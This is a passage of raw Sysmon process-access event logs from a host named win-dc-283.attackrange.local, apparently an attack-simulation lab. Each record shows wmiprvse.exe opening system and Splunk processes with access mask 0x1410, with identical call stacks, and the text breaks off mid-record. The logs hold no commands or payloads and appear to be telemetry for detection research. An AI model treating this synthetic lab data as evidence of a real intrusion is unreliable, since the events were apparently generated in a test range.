10341000x800000000000000024769Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5354-6008-3406-00000000A301}6596C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024768Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-5353-6008-2F06-00000000A301}3716C:\Windows\explorer.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024767Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4405-00000000A301}7000C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024766Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4FA9-6008-4305-00000000A301}7420C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024765Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4DC0-6008-FB02-00000000A301}8056C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024764Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A9B-6008-1501-00000000A301}6076C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024763Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A99-6008-1401-00000000A301}5960C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024762Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8C-6008-0601-00000000A301}2500C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024761Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FF00-00000000A301}4808C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024760Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A8A-6008-FC00-00000000A301}5008C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024759Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.382{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F600-00000000A301}1548C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024758Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A88-6008-F300-00000000A301}4180C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024757Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A27-6008-E400-00000000A301}2860C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024756Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A22-6008-DB00-00000000A301}4244C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024755Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A1A-6008-B100-00000000A301}2640C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024754Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A19-6008-AD00-00000000A301}4236C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024753Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-4A11-6008-9600-00000000A301}4612C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024752Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8200-00000000A301}4876C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024751Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49BC-6008-8100-00000000A301}4864C:\Windows\system32\WinrsHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024750Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 15:59:26.366{7901BC46-5350-6008-1E06-00000000A301}66283184C:\Windows\system32\wbem\wmiprvse.exe{7901BC46-49AF-6008-7F00-00000000A301}4328C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+57d2|C:\Windows\SYSTEM32\framedynos.dll+b171|C:\Windows\system32\wbem\wmiprvse.exe+b13c|C:\Windows\system32\wbem\wmiprvse.exe+ad6b|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+27b0|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x800000000000000024749Microsoft-Windows-Sysmon/Operationalwin-dc-283.attackrange.local-2021-01-20 